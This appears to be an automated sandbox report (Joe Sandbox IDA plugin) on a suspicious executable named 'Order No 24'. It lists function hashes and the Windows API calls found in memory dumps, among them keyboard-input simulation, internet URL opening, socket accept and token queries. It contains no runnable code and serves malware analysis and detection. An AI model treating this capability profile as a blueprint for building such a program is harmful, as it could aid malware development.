• Opcode ID: 1c1cf126a814dce317ca24c0d52ba9d345bcfeed1c4c43c4e7fa3c57a164ca1c
• Instruction ID: 79f04d5133e88eef0bf619b38d07b070cc774b433db98c0ce2f3e3a89bf5662e
• Opcode Fuzzy Hash: 1c1cf126a814dce317ca24c0d52ba9d345bcfeed1c4c43c4e7fa3c57a164ca1c
• Instruction Fuzzy Hash: 2AD0A731450723AFCB20AFF0E848702BAF8BB04300F10C82AF885D2250DF70D8818750
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,00000000,009DBAD3,00000001,009DB6EE,?,00A1DC00), ref: 009DBAEB
• GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 009DBAFD
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetModuleHandleExW$kernel32.dll
• API String ID: 2574300362-199464113
• Opcode ID: 4c31cb38d7f3ec1571c08e86a09ea485ff78ae8e7ef689bb4cf42add7e63bb14
• Instruction ID: c6071d56c58064cc046e6f9f827a2a9f877316d8bad0745fc80a8b09966bd7ea
• Opcode Fuzzy Hash: 4c31cb38d7f3ec1571c08e86a09ea485ff78ae8e7ef689bb4cf42add7e63bb14
• Instruction Fuzzy Hash: C4D0A731940712EFC7309FA1F849B15B6D8BB05300F11881BF843D2254DB74D881C750
APIs
• LoadLibraryA.KERNEL32(advapi32.dll,?,009E3BD1,?,009E3E06), ref: 009E3BE9
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009E3BFB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 2574300362-4033151799
• Opcode ID: 571af57b1a5f97cf5fe8dfe70dcaa99fcfa939190e4407b7129132c72285340c
• Instruction ID: 1147cd17505ced4a092d60e47cee39493fb32d1fce30acf73036bf8ec80665f6
• Opcode Fuzzy Hash: 571af57b1a5f97cf5fe8dfe70dcaa99fcfa939190e4407b7129132c72285340c
• Instruction Fuzzy Hash: F0D09EB1500756EBD7219FE5E809642BBA8AB09715F208919E895A2150DBB4DC818E50
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 89e451635de99195bde90aea27ccb20da890645dffd18702ef951e7b99a34d37
• Instruction ID: abd2eb683633ae745717f86b5aae3eddf91daf31f9b9889e362d515acf801f19
• Opcode Fuzzy Hash: 89e451635de99195bde90aea27ccb20da890645dffd18702ef951e7b99a34d37
• Instruction Fuzzy Hash: 98C15E75A1021AEFCB14CF94C984BEEBBB5FF88710F108598EA45AB291D730DE41DB90
APIs
• CoInitialize.OLE32(00000000), ref: 009DAAB4
• CoUninitialize.OLE32 ref: 009DAABF
  • Part of subcall function 009C0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009C027B
• VariantInit.OLEAUT32(?), ref: 009DAACA
• VariantClear.OLEAUT32(?), ref: 009DAD9D
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
• Opcode ID: 0d787d22c1c3a600158fd0009e85a4cc3ff98929816c9b98992f93540d18c270
• Instruction ID: f13202030c8f0b39af16868451bcfc41aeb6256848b6e04319af2b4fc360330a
• Opcode Fuzzy Hash: 0d787d22c1c3a600158fd0009e85a4cc3ff98929816c9b98992f93540d18c270
• Instruction Fuzzy Hash: 2AA16D352447019FCB15EF64C881B2AB7E5BF88720F14884AF9969B3A1CB34FD05CB86
APIs
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
• Opcode ID: a66ca2640925762ce2d22497b5a565f94486f0f3d8f4b560c450793de41f866c
• Instruction ID: fdcafd98a9254b8c56aa77b9f8c43249c54e9e823eee82da22121c98d32a8112
• Opcode Fuzzy Hash: a66ca2640925762ce2d22497b5a565f94486f0f3d8f4b560c450793de41f866c
• Instruction Fuzzy Hash: 9951BA306247069BDB24AF69D9D5BAEB3E9EF85324F20881FE756C72D1DB349881C701
APIs
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: _memset$__filbuf__getptd_noexit_memcpy_s
• String ID:
• API String ID: 3877424927-0
• Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
• Instruction ID: dc2a922bee39842092e4a8102c9dfec1f6aec73142fa64310cad039e5c056384
• Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
• Instruction Fuzzy Hash: 7951A2B0A00305ABDB248FA9888566EB7B9AF42324F24C729F825962D0D775DF508BC0
APIs
• GetWindowRect.USER32(01027860,?), ref: 009EC544
• ScreenToClient.USER32(?,00000002), ref: 009EC574
• MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 009EC5DA
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: 376aa2ff79a8264f3811c0efd42376c872edbc27d79f8b6355b9b792accf0f2b
• Instruction ID: f8114fe27cc30cd16a31e7187209b9f9113c09ee70af26d1a7397635c161ae32
• Opcode Fuzzy Hash: 376aa2ff79a8264f3811c0efd42376c872edbc27d79f8b6355b9b792accf0f2b
• Instruction Fuzzy Hash: F75196B5900249EFCF11DFA9C880AAE77B9FF85720F108659F89597291D730ED82CB50
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 009BC462
• __itow.LIBCMT ref: 009BC49C
  • Part of subcall function 009BC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 009BC753
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 009BC505
• __itow.LIBCMT ref: 009BC55A
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: MessageSend$__itow
• String ID:
                                                                                                                                  • API String ID: 3379773720-0
                                                                                                                                  • Opcode ID: ed3f557524793a66cad4019ad6ac6e2e9eb61a0212d648eac60098f3d6950ea7
                                                                                                                                  • Instruction ID: 519e3f4d66e97b5f5844373589aa1c59ddf60e0cdec928e1f90033f5ba8b617a
                                                                                                                                  • Opcode Fuzzy Hash: ed3f557524793a66cad4019ad6ac6e2e9eb61a0212d648eac60098f3d6950ea7
                                                                                                                                  • Instruction Fuzzy Hash: 9841FAB1A00609AFDF21EF54CD56FEE7BB9AF89710F000019F905A7291DB749A49CBA1
APIs
• GetKeyboardState.USER32(?,00000000,?,00000001), ref: 009C3966
• SetKeyboardState.USER32(00000080,?,00000001), ref: 009C3982
• PostMessageW.USER32(00000000,00000102,?,00000001), ref: 009C39EF
• SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 009C3A4D
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 15e598935d14f6003645d81029ec5a2989f5fdd280b2e841b4cd7f015f690a0e
• Instruction ID: 467051ae2ab1b8dfd6b6590aa1481791d63a8161f966ccd3a7cbab34fe2022fa
• Opcode Fuzzy Hash: 15e598935d14f6003645d81029ec5a2989f5fdd280b2e841b4cd7f015f690a0e
• Instruction Fuzzy Hash: 5F41F570E04248EAEF308BA48805FFDBBB99B59310F04C15EE4C1A22D1C7B49E95D767
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 009EB5D1
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
• Opcode ID: 379649823027c76d6cd54951de7541507c40460daec296363c5add3fa1e8dbd3
• Instruction ID: 7fefc89ed04bac5aa17eecd9363550ea6355d8c097c0571b4415be2e9bedcd21
• Opcode Fuzzy Hash: 379649823027c76d6cd54951de7541507c40460daec296363c5add3fa1e8dbd3
• Instruction Fuzzy Hash: 44313378601288BFEF22CF9ACC88FAE7768EB06720F104502F601D61E1CB34ED418B51
APIs
• ClientToScreen.USER32(?,?), ref: 009ED807
• GetWindowRect.USER32(?,?), ref: 009ED87D
• PtInRect.USER32(?,?,009EED5A), ref: 009ED88D
• MessageBeep.USER32(00000000), ref: 009ED8FE
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: 6ef98f1d8e68f4c1abdaa8ef91fb8a226ecf5c81ea2a2e29439d2dd8cceb8784
• Instruction ID: c323c19567719a00e549de4c53b79ee95312edea4ecf49a817fe3beaf8c77411
• Opcode Fuzzy Hash: 6ef98f1d8e68f4c1abdaa8ef91fb8a226ecf5c81ea2a2e29439d2dd8cceb8784
• Instruction Fuzzy Hash: E941C278A01299DFCB12DF9AC884B69BBF9FF85310F1981A9E414CB251D331ED42CB41
APIs
• GetKeyboardState.USER32(?,7694C0D0,?,00008000), ref: 009C3AB8
• SetKeyboardState.USER32(00000080,?,00008000), ref: 009C3AD4
• PostMessageW.USER32(00000000,00000101,00000000,?), ref: 009C3B34
• SendInput.USER32(00000001,?,0000001C,7694C0D0,?,00008000), ref: 009C3B92
Similarity
• API ID: KeyboardState$InputMessagePostSend
• String ID:
• API String ID: 432972143-0
• Opcode ID: 387c9f612bf0bcf245ea912ef994a790dc6e597cd2b81d2c396bbb52ce196f85
• Instruction ID: 483bea4e439c41a9839b1455b5b3ae5cdb5cd2e4aecd67e9d602a0fa22632e57
• Opcode Fuzzy Hash: 387c9f612bf0bcf245ea912ef994a790dc6e597cd2b81d2c396bbb52ce196f85
• Instruction Fuzzy Hash: 0A312471E00258AEEF209BA48819FFE7BB99B55310F04C15EE481A32D1C7759F46D763
APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 009B4038
• __isleadbyte_l.LIBCMT ref: 009B4066
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 009B4094
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 009B40CA
Similarity
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 988095d25b6a25d52c50adb387920ebe899b5b3e83b1e1394ae2d6f6de9b502d
• Instruction ID: 8b4c0a4d6227ca08d354224eaad4e938d974d34d6bacbdb365c3c3a36273ff79
• Opcode Fuzzy Hash: 988095d25b6a25d52c50adb387920ebe899b5b3e83b1e1394ae2d6f6de9b502d
• Instruction Fuzzy Hash: E031B23160021AAFDB21EF74C945BFA7BB9FF41320F154528EA65871A2E731D891EB90
APIs
• GetForegroundWindow.USER32 ref: 009E7CB9
  • Part of subcall function 009C5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 009C5F6F
  • Part of subcall function 009C5F55: GetCurrentThreadId.KERNEL32 ref: 009C5F76
  • Part of subcall function 009C5F55: AttachThreadInput.USER32(00000000,?,009C781F), ref: 009C5F7D
• GetCaretPos.USER32(?), ref: 009E7CCA
• ClientToScreen.USER32(00000000,?), ref: 009E7D03
• GetForegroundWindow.USER32 ref: 009E7D09
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
• Opcode ID: cf9c610f83d658d38e762982619fa4085d746d0fcf1fbefb59cb56d7181796ba
• Instruction ID: 7cbec740e6a5c9adb0da6a1b4f28c0b060de5650aa1fdfc92cef2c9d66c033c2
• Opcode Fuzzy Hash: cf9c610f83d658d38e762982619fa4085d746d0fcf1fbefb59cb56d7181796ba
• Instruction Fuzzy Hash: 6A310F72D00108AFDB01EFA9D845AEFBBF9EF94310B10846AE815E3211D6319E45CBA1
APIs
  • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
• GetCursorPos.USER32(?), ref: 009EF211
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,009FE4C0,?,?,?,?,?), ref: 009EF226
• GetCursorPos.USER32(?), ref: 009EF270
• DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,009FE4C0,?,?,?), ref: 009EF2A6
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2864067406-0
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 009D4358
  • Part of subcall function 009D43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009D4401
  • Part of subcall function 009D43E2: InternetCloseHandle.WININET(00000000), ref: 009D449E
Similarity
• API ID: Internet$CloseConnectHandleOpen
• String ID:
• API String ID: 1463438336-0
APIs
• GetWindowLongW.USER32(?,000000EC), ref: 009E8AA6
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 009E8AC0
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 009E8ACE
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 009E8ADC
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
APIs
• select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 009D8AE0
• __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 009D8AF2
• accept.WSOCK32(00000000,00000000,00000000), ref: 009D8AFF
• WSAGetLastError.WSOCK32(00000000), ref: 009D8B16
Similarity
• API ID: ErrorLastacceptselect
• String ID:
• API String ID: 385091864-0
APIs
  • Part of subcall function 009C1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,009C0ABB,?,?,?,009C187A,00000000,000000EF,00000119,?,?), ref: 009C1E77
  • Part of subcall function 009C1E68: lstrcpyW.KERNEL32(00000000,?,?,009C0ABB,?,?,?,009C187A,00000000,000000EF,00000119,?,?,00000000), ref: 009C1E9D
  • Part of subcall function 009C1E68: lstrcmpiW.KERNEL32(00000000,?,009C0ABB,?,?,?,009C187A,00000000,000000EF,00000119,?,?), ref: 009C1ECE
• lstrlenW.KERNEL32(?,00000002,?,?,?,?,009C187A,00000000,000000EF,00000119,?,?,00000000), ref: 009C0AD4
• lstrcpyW.KERNEL32(00000000,?,?,009C187A,00000000,000000EF,00000119,?,?,00000000), ref: 009C0AFA
• lstrcmpiW.KERNEL32(00000002,cdecl,?,009C187A,00000000,000000EF,00000119,?,?,00000000), ref: 009C0B2E
Strings
Similarity
• API ID: lstrcmpilstrcpylstrlen
• String ID: cdecl
• API String ID: 4031866154-3896280584
APIs
• _free.LIBCMT ref: 009B2FB5
  • Part of subcall function 009A395C: __FF_MSGBANNER.LIBCMT ref: 009A3973
  • Part of subcall function 009A395C: __NMSG_WRITE.LIBCMT ref: 009A397A
  • Part of subcall function 009A395C: RtlAllocateHeap.NTDLL(01000000,00000000,00000001,00000001,00000000,?,?,0099F507,?,0000000E), ref: 009A399F
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009C05AC
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009C05C7
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009C05DD
• FreeLibrary.KERNEL32(?), ref: 009C0632
Similarity
• API ID: Type$FileFreeLibraryLoadModuleNameRegister
• String ID:
• API String ID: 3137044355-0
APIs
• CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 009C6733
• _memset.LIBCMT ref: 009C6754
• DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009C67A6
• CloseHandle.KERNEL32(00000000), ref: 009C67AF
Similarity
• API ID: CloseControlCreateDeviceFileHandle_memset
• String ID:
• API String ID: 1157408455-0
                                                                                                                                  • Opcode ID: d43cfc31e056aa7a19e4a7723dcaf9ff6bf107cc5c6e441e2ea6cc89b05381e1
                                                                                                                                  • Instruction ID: 4013db09a9df87430387817978941da04c46117edbb79506772bf77248095547
                                                                                                                                  • Opcode Fuzzy Hash: d43cfc31e056aa7a19e4a7723dcaf9ff6bf107cc5c6e441e2ea6cc89b05381e1
                                                                                                                                  • Instruction Fuzzy Hash: 7A11E372D012287AE7209BA5AC4DFABBABCEF44724F10469AF504E71C0D2744E818BB5
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 009BAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009BAA79
                                                                                                                                    • Part of subcall function 009BAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009BAA83
                                                                                                                                    • Part of subcall function 009BAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009BAA92
                                                                                                                                    • Part of subcall function 009BAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009BAA99
                                                                                                                                    • Part of subcall function 009BAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009BAAAF
                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000000,009BADE4,?,?), ref: 009BB21B
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 009BB227
                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 009BB22E
                                                                                                                                  • CopySid.ADVAPI32(?,00000000,?), ref: 009BB247
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
• String ID:
• API String ID: 4217664535-0
• Opcode ID: 6374a884fdc71918e64fd053d0649d765ca5fb05efa1d82785386914f7606997
• Instruction ID: 8cdd09c6e6e012db11b183c998d656e87e3717b79f065d400ba41f2995106d39
• Opcode Fuzzy Hash: 6374a884fdc71918e64fd053d0649d765ca5fb05efa1d82785386914f7606997
• Instruction Fuzzy Hash: 9611C172A00209EFCB04DF98DE85AEEB7BDEF94324F14842DE95297250D771AE45CB10
APIs
• SendMessageW.USER32(?,000000B0,?,?), ref: 009BB498
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 009BB4AA
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 009BB4C0
• SendMessageW.USER32(?,000000C9,?,00000000), ref: 009BB4DB
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: MessageSend
• String ID:
• API String ID: 3850602802-0
• Opcode ID: 0473f0c73cd4896781e71c87c2e196984c977551506435d3d63b7015a06ee839
• Instruction ID: 394e054c74d0dcd5cc4b2817aad2b0ac95cf61a3d9bb344deb98a1337eaf2cd0
• Opcode Fuzzy Hash: 0473f0c73cd4896781e71c87c2e196984c977551506435d3d63b7015a06ee839
• Instruction Fuzzy Hash: BA11487A900218FFDB11DFA8C981EDDBBB9FB08710F204091E604B7290D771AE11DB94
APIs
  • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
• DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0099B5A5
• GetClientRect.USER32(?,?), ref: 009FE69A
• GetCursorPos.USER32(?), ref: 009FE6A4
• ScreenToClient.USER32(?,?), ref: 009FE6AF
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: Client$CursorLongProcRectScreenWindow
• String ID:
• API String ID: 4127811313-0
• Opcode ID: 88ee13d0e4bff4e522bbb5c71c1b0444a3db0db6971eac334aeb63d8e96b0453
• Instruction ID: 8d5bd707d78c8beade0e9fcd8ef7a241bb451f7eea54f7da34948f984c3f9ed7
• Opcode Fuzzy Hash: 88ee13d0e4bff4e522bbb5c71c1b0444a3db0db6971eac334aeb63d8e96b0453
• Instruction Fuzzy Hash: 5F11363690002EBFCF10DF98DD459AE77B9EF49305F410455F905E7150D738AA92CBA2
APIs
• GetCurrentThreadId.KERNEL32 ref: 009C7352
• MessageBoxW.USER32(?,?,?,?), ref: 009C7385
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 009C739B
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009C73A2
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: bd503fd56cd125ad19e2fcafe0617a30a655cea55b15f523d3d2fec158f407ce
• Instruction ID: b8889ea6bad486451a87a50d5b30f80cb7f738273f1ec77adf355ee69ba3ddd0
• Opcode Fuzzy Hash: bd503fd56cd125ad19e2fcafe0617a30a655cea55b15f523d3d2fec158f407ce
• Instruction Fuzzy Hash: 2511E577A04258BBCB01DBE89C05FDEBBAD9B85324F044319F821D3291D6B189029FA1
APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
• GetStockObject.GDI32(00000011), ref: 0099D1CE
• SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
Memory Dump Source
• Source File: 00000000.00000002.2141062486.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
• Associated: 00000000.00000002.2141043833.0000000000980000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A0D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141127993.0000000000A2E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141165765.0000000000A3A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2141181504.0000000000A44000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_980000_Order No 24.jbxd
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
